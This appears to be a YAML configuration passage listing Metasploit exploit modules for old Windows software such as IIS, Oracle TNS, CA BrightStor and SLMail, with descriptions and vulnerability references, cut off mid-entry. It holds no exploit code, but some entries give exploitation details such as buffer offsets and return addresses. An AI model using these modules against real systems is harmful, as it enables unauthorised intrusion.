path: extensions/metasploit/ + class: Msf_module +msf_gamsoft_telsrv_username: + enable: true + msf: true + msf_key: windows/telnet/gamsoft_telsrv_username + name: GAMSoft TelSrv 1.5 Username Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.\n\ + \t\t\t\tOther versions may also be affected. The service terminates after exploitation,\n\ + \t\t\t\tso you only get one chance!\n\ + \t\t\t" + authors: + - - CVE + - 2000-0665 + - - OSVDB + - "373" + - - BID + - "1478" + - - URL + - http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip + path: extensions/metasploit/ + class: Msf_module +msf_postgres_payload: + enable: true + msf: true + msf_key: windows/postgres/postgres_payload + name: PostgreSQL for Microsoft Windows Payload Execution + category: Metasploit + description: "\n\ + \t\t\t\tThis module creates and enables a custom UDF (user defined function) on the\n\ + \t\t\t\ttarget host via the UPDATE pg_largeobject method of binary injection. On\n\ + \t\t\t\tdefault Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres\n\ + \t\t\t\tservice account may write to the Windows temp directory, and may source\n\ + \t\t\t\tUDF DLL's from there as well.\n\n\ + \t\t\t\tPostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are \n\ + \t\t\t\tvalid targets for this module.\n\n\ + \t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\ + \t\t\t\tattack is finished, as well as the UDF DLL and the OID.\n\ + \t\t\t" + authors: [] + + path: extensions/metasploit/ + class: Msf_module +msf_winvnc_http_get: + enable: true + msf: true + msf_key: windows/vnc/winvnc_http_get + name: WinVNC Web Server <= v3.3.3r7 GET Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a buffer overflow in the AT&T WinVNC version\n\ + \t\t\t\t<= v3.3.3r7 web server. When debugging mode with logging is\n\ + \t\t\t\tenabled (non-default), an overly long GET request can overwrite\n\ + \t\t\t\tthe stack. This exploit does not work well with VNC payloads!\n\ + \t\t\t" + authors: + - - BID + - "2306" + - - OSVDB + - "6280" + - - CVE + - 2001-0168 + path: extensions/metasploit/ + class: Msf_module +msf_realvnc_client: + enable: true + msf: true + msf_key: windows/vnc/realvnc_client + name: RealVNC 3.3.7 Client Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).\n\ + \t\t\t" + authors: + - - CVE + - 2001-0167 + - - OSVDB + - "6281" + - - BID + - "2305" + path: extensions/metasploit/ + class: Msf_module +msf_ultravnc_client: + enable: true + msf: true + msf_key: windows/vnc/ultravnc_client + name: UltraVNC 1.0.1 Client Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a buffer overflow in UltraVNC Win32\n\ + \t\t\t\tViewer 1.0.1 Release.\n\ + \t\t\t" + authors: + - - CVE + - 2006-1652 + - - OSVDB + - "24456" + - - BID + - "17378" + path: extensions/metasploit/ + class: Msf_module +msf_ms10_045_outlook_ref_only: + enable: true + msf: true + msf_key: windows/email/ms10_045_outlook_ref_only + name: Outlook ATTACH_BY_REF_ONLY File Execution + category: Metasploit + description: "\n\ + \t\t\t\tIt has been discovered that certain e-mail message cause Outlook to create Windows\n\ + \t\t\t\tshortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n\ + \t\t\t\tstreams with certain MAPI attachment properties, it is possible to set a path name\n\ + \t\t\t\tto files to be executed. When a user double clicks on such an attachment or message,\n\ + \t\t\t\tOutlook will proceed to execute the file that is set by the path name value. These\n\ + \t\t\t\tfiles can be local files, but also file stored remotely for example on a file share.\n\ + \t\t\t\tExploitation is limited by the fact that its is not possible for attackers to supply\n\ + \t\t\t\tcommand line options.\n\ + \t\t\t" + authors: + - - MSB + - MS10-045 + - - CVE + - 2010-0266 + - - OSVDB + - "66296" + - - BID + - "41446" + - - URL + - http://www.akitasecurity.nl/advisory.php?id=AK20091001 + path: extensions/metasploit/ + class: Msf_module +msf_ms10_045_outlook_ref_resolve: + enable: true + msf: true + msf_key: windows/email/ms10_045_outlook_ref_resolve + name: Outlook ATTACH_BY_REF_RESOLVE File Execution + category: Metasploit + description: "\n\ + \t\t\t\tIt has been discovered that certain e-mail message cause Outlook to create Windows\n\ + \t\t\t\tshortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n\ + \t\t\t\tstreams with certain MAPI attachment properties, it is possible to set a path name\n\ + \t\t\t\tto files to be executed. When a user double clicks on such an attachment or message,\n\ + \t\t\t\tOutlook will proceed to execute the file that is set by the path name value. These\n\ + \t\t\t\tfiles can be local files, but also file stored remotely for example on a file share.\n\ + \t\t\t\tExploitation is limited by the fact that its is not possible for attackers to supply\n\ + \t\t\t\tcommand line options.\n\ + \t\t\t" + authors: + - - MSB + - MS10-045 + - - CVE + - 2010-0266 + - - OSVDB + - "66296" + - - BID + - "41446" + - - URL + - http://www.akitasecurity.nl/advisory.php?id=AK20091001 + path: extensions/metasploit/ + class: Msf_module +msf_seattlelab_pass: + enable: true + msf: true + msf_key: windows/pop3/seattlelab_pass + name: Seattle Lab Mail 5.5 POP3 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThere exists an unauthenticated buffer overflow vulnerability\n\ + \t\t\t\tin the POP3 server of Seattle Lab Mail 5.5 when sending a password\n\ + \t\t\t\twith excessive length.\n\n\ + \t\t\t\tSuccessful exploitation should not crash either the\n\ + \t\t\t\tservice or the server; however, after initial use the\n\ + \t\t\t\tport cannot be reused for successive exploitation until\n\ + \t\t\t\tthe service has been restarted. Consider using a command\n\ + \t\t\t\texecution payload following the bind shell to restart\n\ + \t\t\t\tthe service if you need to reuse the same port.\n\n\ + \t\t\t\tThe overflow appears to occur in the debugging/error reporting\n\ + \t\t\t\tsection of the slmail.exe executable, and there are multiple\n\ + \t\t\t\toffsets that will lead to successful exploitation. This exploit\n\ + \t\t\t\tuses 2606, the offset that creates the smallest overall payload.\n\ + \t\t\t\tThe other offset is 4654.\n\n\ + \t\t\t\tThe return address is overwritten with a \"jmp esp\" call from the\n\ + \t\t\t\tapplication library SLMFC.DLL found in %SYSTEM%\\system32\\. This\n\ + \t\t\t\treturn address works against all version of Windows and service packs.\n\n\ + \t\t\t\tThe last modification date on the library is dated 06/02/99. Assuming\n\ + \t\t\t\tthat the code where the overflow occurs has not changed in some time,\n\ + \t\t\t\tprior version of SLMail may also be vulnerable with this exploit. The\n\ + \t\t\t\tauthor has not been able to acquire older versions of SLMail for\n\ + \t\t\t\ttesting purposes. Please let us know if you were able to get this\n\ + \t\t\t\texploit working against other SLMail versions.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0264 + - - OSVDB + - "11975" + - - BID + - "7519" + path: extensions/metasploit/ + class: Msf_module +msf_tns_arguments: + enable: true + msf: true + msf_key: windows/oracle/tns_arguments + name: Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Oracle 8i. When\n\ + \t\t\t\tsending a specially crafted packet containing a overly long\n\ + \t\t\t\tARGUMENTS string to the TNS service, an attacker may be able\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0499 + - - OSVDB + - "9427" + - - BID + - "2941" + path: extensions/metasploit/ + class: Msf_module +msf_osb_ndmp_auth: + enable: true + msf: true + msf_key: windows/oracle/osb_ndmp_auth + name: Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThe module exploits a stack buffer overflow in Oracle Secure Backup.\n\ + \t\t\t\tWhen sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2008-5444 + - - OSVDB + - "51340" + - - URL + - http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html + path: extensions/metasploit/ + class: Msf_module +msf_tns_service_name: + enable: true + msf: true + msf_key: windows/oracle/tns_service_name + name: Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Oracle. When\n\ + \t\t\t\tsending a specially crafted packet containing a long SERVICE_NAME\n\ + \t\t\t\tto the TNS service, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2002-0965 + - - OSVDB + - "5041" + - - BID + - "4845" + - - URL + - http://www.appsecinc.com/resources/alerts/oracle/02-0013.shtml + - - URL + - http://www.oracle.com/technology/deploy/security/pdf/net9_dos_alert.pdf + path: extensions/metasploit/ + class: Msf_module +msf_tns_auth_sesskey: + enable: true + msf: true + msf_key: windows/oracle/tns_auth_sesskey + name: Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Oracle. When\n\ + \t\t\t\tsending a specially crafted packet containing a long AUTH_SESSKEY value\n\ + \t\t\t\tto the TNS service, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-1979 + - - OSVDB + - "59110" + - - BID + - "36747" + - - URL + - http://blogs.conus.info/node/28 + - - URL + - http://blogs.conus.info/node/35 + - - URL + - http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2009.html + path: extensions/metasploit/ + class: Msf_module +msf_lgserver: + enable: true + msf: true + msf_key: windows/brightstor/lgserver + name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n\ + \t\t\t\toverflow the buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-0449 + - - OSVDB + - "31593" + - - BID + - "22342" + path: extensions/metasploit/ + class: Msf_module +msf_sql_agent: + enable: true + msf: true + msf_key: windows/brightstor/sql_agent + name: CA BrightStor Agent for Microsoft SQL Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\ + \t\t\t\tAgent for Microsoft SQL Server. This vulnerability was\n\ + \t\t\t\tdiscovered by cybertronic[at]gmx.net.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1272 + - - OSVDB + - "18501" + - - BID + - "14453" + - - URL + - http://www.idefense.com/application/poi/display?id=287&type=vulnerabilities + - - URL + - http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33239 + path: extensions/metasploit/ + class: Msf_module +msf_lgserver_rxssetdatagrowthscheduleandfilter: + enable: true + msf: true + msf_key: windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter + name: CA BrightStor ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsSetDataGrowthScheduleAndFilter),\n\ + \t\t\t\tan attacker could overflow the buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3216 + - - OSVDB + - "35329" + - - BID + - "24348" + path: extensions/metasploit/ + class: Msf_module +msf_ca_arcserve_342: + enable: true + msf: true + msf_key: windows/brightstor/ca_arcserve_342 + name: Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrighStor ARCserve r11.5 (build 3884).\n\ + \t\t\t\tBy sending a specially crafted RPC request to opcode 0x342, an attacker could overflow the buffer\n\ + \t\t\t\tand execute arbitrary code. In order to successfully exploit this vulnerability, you will need\n\ + \t\t\t\tset the hostname argument (HNAME).\n\ + \t\t\t" + authors: + - - BID + - "31684" + - - OSVDB + - "49468" + - - CVE + - 2008-4397 + - - URL + - http://crackinglandia.blogspot.com/2009/10/el-colador-de-ca-computer-associates.html + path: extensions/metasploit/ + class: Msf_module +msf_lgserver_multi: + enable: true + msf: true + msf_key: windows/brightstor/lgserver_multi + name: CA BrightStor ARCserve for Laptops & Desktops LGServer Multiple Commands Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request to multiple commands,\n\ + \t\t\t\tan attacker could overflow the buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3216 + - - OSVDB + - "35329" + - - BID + - "24348" + path: extensions/metasploit/ + class: Msf_module +msf_message_engine_72: + enable: true + msf: true + msf_key: windows/brightstor/message_engine_72 + name: CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\t11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n\ + \t\t\t\tthe buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "68329" + - - URL + - http://www.metasploit.com/users/mc + path: extensions/metasploit/ + class: Msf_module +msf_tape_engine_8A: + enable: true + msf: true + msf_key: windows/brightstor/tape_engine_8A + name: CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\tr11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n\ + \t\t\t\tthe buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "68330" + - - URL + - http://www.metasploit.com/users/mc + path: extensions/metasploit/ + class: Msf_module +msf_hsmserver: + enable: true + msf: true + msf_key: windows/brightstor/hsmserver + name: CA BrightStor HSM Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits one of the multiple stack buffer overflows in Computer Associates BrightStor HSM.\n\ + \t\t\t\tBy sending a specially crafted request, an attacker could overflow the buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5082 + - - OSVDB + - "41363" + - - BID + - "25823" + path: extensions/metasploit/ + class: Msf_module +msf_universal_agent: + enable: true + msf: true + msf_key: windows/brightstor/universal_agent + name: CA BrightStor Universal Agent Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a convoluted heap overflow in the CA\n\ + \t\t\t\tBrightStor Universal Agent service. Triple userland\n\ + \t\t\t\texception results in heap growth and execution of\n\ + \t\t\t\tdereferenced function pointer at a specified address.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1018 + - - OSVDB + - "15471" + - - BID + - "13102" + - - URL + - http://www.idefense.com/application/poi/display?id=232&type=vulnerabilities + path: extensions/metasploit/ + class: Msf_module +msf_lgserver_rxsuselicenseini: + enable: true + msf: true + msf_key: windows/brightstor/lgserver_rxsuselicenseini + name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request (rxsUseLicenseIni), an\n\ + \t\t\t\tattacker could overflow the buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3216 + - - OSVDB + - "35329" + - - BID + - "24348" + path: extensions/metasploit/ + class: Msf_module +msf_license_gcr: + enable: true + msf: true + msf_key: windows/brightstor/license_gcr + name: CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup 11.0.\n\ + \t\t\t\tBy sending a specially crafted request to the lic98rmtd.exe service, an attacker\n\ + \t\t\t\tcould overflow the buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0581 + - - OSVDB + - "14389" + - - BID + - "12705" + path: extensions/metasploit/ + class: Msf_module +msf_discovery_udp: + enable: true + msf: true + msf_key: windows/brightstor/discovery_udp + name: CA BrightStor Discovery Service Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\ + \t\t\t\tDiscovery Service. This vulnerability occurs when a large\n\ + \t\t\t\trequest is sent to UDP port 41524, triggering a stack buffer\n\ + \t\t\t\toverflow.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0260 + - - OSVDB + - "13613" + - - BID + - "12491" + - - URL + - http://www.idefense.com/application/poi/display?id=194&type=vulnerabilities + path: extensions/metasploit/ + class: Msf_module +msf_message_engine_heap: + enable: true + msf: true + msf_key: windows/brightstor/message_engine_heap + name: CA BrightStor ARCserve Message Engine Heap Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\t11.5. By sending a specially crafted RPC request, an attacker could overflow the\n\ + \t\t\t\tbuffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-5143 + - - OSVDB + - "29533" + - - BID + - "20365" + path: extensions/metasploit/ + class: Msf_module +msf_tape_engine: + enable: true + msf: true + msf_key: windows/brightstor/tape_engine + name: CA BrightStor ARCserve Tape Engine Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\tr11.1 - r11.5. By sending a specially crafted DCERPC request, an attacker could overflow\n\ + \t\t\t\tthe buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6076 + - - OSVDB + - "30637" + - - BID + - "21221" + - - URL + - http://www.milw0rm.com/exploits/3086 + - - URL + - http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=101317 + path: extensions/metasploit/ + class: Msf_module +msf_etrust_itm_alert: + enable: true + msf: true + msf_key: windows/brightstor/etrust_itm_alert + name: Computer Associates Alert Notification Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Computer Associates Threat Manager for the Enterprise r8.1\n\ + \t\t\t\tBy sending a specially crafted RPC request, an attacker could overflow the buffer and execute arbitrary code.\n\ + \t\t\t\tIn order to successfully exploit this vulnerability, you will need valid logon credentials to the target.\n\ + \t\t\t" + authors: + - - CVE + - 2007-4620 + - - OSVDB + - "44040" + - - BID + - "28605" + path: extensions/metasploit/ + class: Msf_module +msf_message_engine: + enable: true + msf: true + msf_key: windows/brightstor/message_engine + name: CA BrightStor ARCserve Message Engine Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\t11.1 - 11.5 SP2. By sending a specially crafted RPC request, an attacker could overflow\n\ + \t\t\t\tthe buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-0169 + - - OSVDB + - "31318" + - - BID + - "22005" + path: extensions/metasploit/ + class: Msf_module +msf_mediasrv_sunrpc: + enable: true + msf: true + msf_key: windows/brightstor/mediasrv_sunrpc + name: CA BrightStor ArcServe Media Service Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploit targets a stack buffer overflow in the MediaSrv RPC service of CA\n\ + \t\t\t\tBrightStor Arcserve. By sending a specially crafted SUNRPC request, an attacker\n\ + \t\t\t\tcan overflow a stack buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2139 + - - OSVDB + - "35326" + - - BID + - "23635" + - - URL + - https://www.zerodayinitiative.com/advisories/ZDI-07-022.html + path: extensions/metasploit/ + class: Msf_module +msf_discovery_tcp: + enable: true + msf: true + msf_key: windows/brightstor/discovery_tcp + name: CA BrightStor Discovery Service TCP Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the CA BrightStor\n\ + \t\t\t\tDiscovery Service. This vulnerability occurs when a specific\n\ + \t\t\t\ttype of request is sent to the TCP listener on port 41523.\n\ + \t\t\t\tThis vulnerability was discovered by cybertronic[at]gmx.net\n\ + \t\t\t\tand affects all known versions of the BrightStor product.\n\ + \t\t\t\tThis module is based on the 'cabrightstor_disco' exploit by\n\ + \t\t\t\tHD Moore.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2535 + - - OSVDB + - "13814" + - - BID + - "12536" + - - URL + - http://archives.neohapsis.com/archives/bugtraq/2005-02/0123.html + - - URL + - http://milw0rm.com/exploits/1131 + path: extensions/metasploit/ + class: Msf_module +msf_lgserver_rxrlogin: + enable: true + msf: true + msf_key: windows/brightstor/lgserver_rxrlogin + name: CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Computer Associates BrightStor ARCserve Backup\n\ + \t\t\t\tfor Laptops & Desktops 11.1. By sending a specially crafted request, an attacker could\n\ + \t\t\t\toverflow the buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5003 + - - OSVDB + - "41353" + - - BID + - "24348" + path: extensions/metasploit/ + class: Msf_module +msf_ms01_023_printer: + enable: true + msf: true + msf_key: windows/iis/ms01_023_printer + name: Microsoft IIS 5.0 Printer Host Header Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a buffer overflow in the request processor of\n\ + \t\t\t\tthe Internet Printing Protocol ISAPI module in IIS. This\n\ + \t\t\t\tmodule works against Windows 2000 service pack 0 and 1. If\n\ + \t\t\t\tthe service stops responding after a successful compromise,\n\ + \t\t\t\trun the exploit a couple more times to completely kill the\n\ + \t\t\t\thung process.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0241 + - - OSVDB + - "3323" + - - BID + - "2674" + - - MSB + - MS01-023 + - - URL + - http://seclists.org/lists/bugtraq/2001/May/0005.html + path: extensions/metasploit/ + class: Msf_module +msf_ms02_018_htr: + enable: true + msf: true + msf_key: windows/iis/ms02_018_htr + name: Microsoft IIS 4.0 .HTR Path Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a buffer overflow in the ISAPI ISM.DLL used to\n\ + \t\t\t\tprocess HTR scripting in IIS 4.0. This module works against\n\ + \t\t\t\tWindows NT 4 Service Packs 3, 4, and 5. The server will\n\ + \t\t\t\tcontinue to process requests until the payload being\n\ + \t\t\t\texecuted has exited. If you've set EXITFUNC to 'seh', the\n\ + \t\t\t\tserver will continue processing requests, but you will have\n\ + \t\t\t\ttrouble terminating a bind shell. If you set EXITFUNC to\n\ + \t\t\t\tthread, the server will crash upon exit of the bind shell.\n\ + \t\t\t\tThe payload is alpha-numerically encoded without a NOP sled\n\ + \t\t\t\tbecause otherwise the data gets mangled by the filters.\n\ + \t\t\t" + authors: + - - CVE + - 1999-0874 + - - OSVDB + - "3325" + - - BID + - "307" + - - URL + - http://www.eeye.com/html/research/advisories/AD19990608.html + - - MSB + - MS02-018 + path: extensions/metasploit/ + class: Msf_module +msf_ms01_033_idq: + enable: true + msf: true + msf_key: windows/iis/ms01_033_idq + name: Microsoft IIS 5.0 IDQ Path Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the IDQ ISAPI handler for\n\ + \t\t\t\tMicrosoft Index Server.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0500 + - - OSVDB + - "568" + - - MSB + - MS01-033 + - - BID + - "2880" + path: extensions/metasploit/ + class: Msf_module +msf_iis_webdav_upload_asp: + enable: true + msf: true + msf_key: windows/iis/iis_webdav_upload_asp + name: Microsoft IIS WebDAV Write Access Code Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module can be used to execute a payload on IIS servers that\n\ + \t\t\t\thave world-writeable directories. The payload is uploaded as an ASP\n\ + \t\t\t\tscript using a WebDAV PUT request.\n\ + \t\t\t" + authors: + - - OSVDB + - "397" + - - BID + - "12141" + path: extensions/metasploit/ + class: Msf_module +msf_ms03_007_ntdll_webdav: + enable: true + msf: true + msf_key: windows/iis/ms03_007_ntdll_webdav + name: Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis exploits a buffer overflow in NTDLL.dll on Windows 2000\n\ + \t\t\t\tthrough the SEARCH WebDAV method in IIS. This particular\n\ + \t\t\t\tmodule only works against Windows 2000. It should have a\n\ + \t\t\t\treasonable chance of success against any service pack.\n\ + \t\t\t" + authors: + - - CVE + - 2003-0109 + - - OSVDB + - "4467" + - - BID + - "7116" + - - MSB + - MS03-007 + path: extensions/metasploit/ + class: Msf_module +msf_ms01_026_dbldecode: + enable: true + msf: true + msf_key: windows/iis/ms01_026_dbldecode + name: Microsoft IIS/PWS CGI Filename Double Decode Command Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module will execute an arbitrary payload on a Microsoft IIS installation\n\ + \t\t\t\tthat is vulnerable to the CGI double-decode vulnerability of 2001.\n\n\ + \t\t\t\tNOTE: This module will leave a metasploit payload in the IIS scripts directory.\n\ + \t\t\t" + authors: + - - CVE + - 2001-0333 + - - OSVDB + - "556" + - - BID + - "2708" + - - MSB + - MS01-026 + - - URL + - http://marc.info/?l=bugtraq&m=98992056521300&w=2 + path: extensions/metasploit/ + class: Msf_module +msf_vuplayer_m3u: + enable: true + msf: true + msf_key: windows/fileformat/vuplayer_m3u + name: VUPlayer M3U Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack over flow in VUPlayer <= 2.49. When\n\ + \t\t\t\t\tthe application is used to open a specially crafted m3u file, an buffer is overwritten allowing\n\ + \t\t\t\t\tfor the execution of arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6251 + - - OSVDB + - "31710" + path: extensions/metasploit/ + class: Msf_module +msf_audio_wkstn_pls: + enable: true + msf: true + msf_key: windows/fileformat/audio_wkstn_pls + name: Audio Workstation 6.4.2.4.3 pls Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.\n\ + \t\t\t\tWhen opening a malicious pls file with the Audio Workstation,\n\ + \t\t\t\ta remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-0476 + - - OSVDB + - "55424" + - - URL + - http://www.exploit-db.com/exploits/10353 + path: extensions/metasploit/ + class: Msf_module +msf_galan_fileformat_bof: + enable: true + msf: true + msf_key: windows/fileformat/galan_fileformat_bof + name: gAlan 0.2.1 Buffer Overflow Exploit + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in gAlan 0.2.1\n\ + \t\t\tBy creating a specially crafted galan file, an an attacker may be able\n\ + \t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "60897" + - - URL + - http://www.exploit-db.com/exploits/10339 + path: extensions/metasploit/ + class: Msf_module +msf_millenium_mp3_pls: + enable: true + msf: true + msf_key: windows/fileformat/millenium_mp3_pls + name: Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.\n\ + \t\t\t\t\tAn attacker must send the file to victim and the victim must open the file.\n\ + \t\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\ + \t\t\t\t\tPLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio.\n\ + \t\t\t\t\tThis functionality has not been tested in this module.\n\ + \t\t\t" + authors: + - - OSVDB + - "56574" + - - URL + - http://www.exploit-db.com/exploits/9618 + - - URL + - http://www.exploit-db.com/exploits/10240 + path: extensions/metasploit/ + class: Msf_module +msf_ca_cab: + enable: true + msf: true + msf_key: windows/fileformat/ca_cab + name: CA Antivirus Engine CAB Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637.\n\ + \t\t\t\t\tBy creating a specially crafted CAB file, an an attacker may be able\n\ + \t\t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2007-2864 + - - OSVDB + - "35245" + - - BID + - "24330" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-07-035.html + path: extensions/metasploit/ + class: Msf_module +msf_hhw_hhp_contentfile_bof: + enable: true + msf: true + msf_key: windows/fileformat/hhw_hhp_contentfile_bof + name: HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HTML Help Workshop 4.74\n\ + \t\t\t\t\tBy creating a specially crafted hhp file, an an attacker may be able\n\ + \t\t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0564 + - - OSVDB + - "22941" + - - URL + - http://www.exploit-db.com/exploits/1470 + - - URL + - http://www.exploit-db.com/exploits/1495 + path: extensions/metasploit/ + class: Msf_module +msf_ms09_067_excel_featheader: + enable: true + msf: true + msf_key: windows/fileformat/ms09_067_excel_featheader + name: Microsoft Excel Malformed FEATHEADER Record Vulnerability + category: Metasploit + description: "\n\ + \t\t\t\t\t\tThis module exploits a vulnerability in the handling of the FEATHEADER record\n\ + \t\t\t\t\tby Microsoft Excel. Revisions of Office XP and later prior to the release of the\n\ + \t\t\t\t\tMS09-067 bulletin are vulnerable.\n\n\ + \t\t\t\t\tWhen processing a FEATHEADER (Shared Feature) record, Microsoft used a 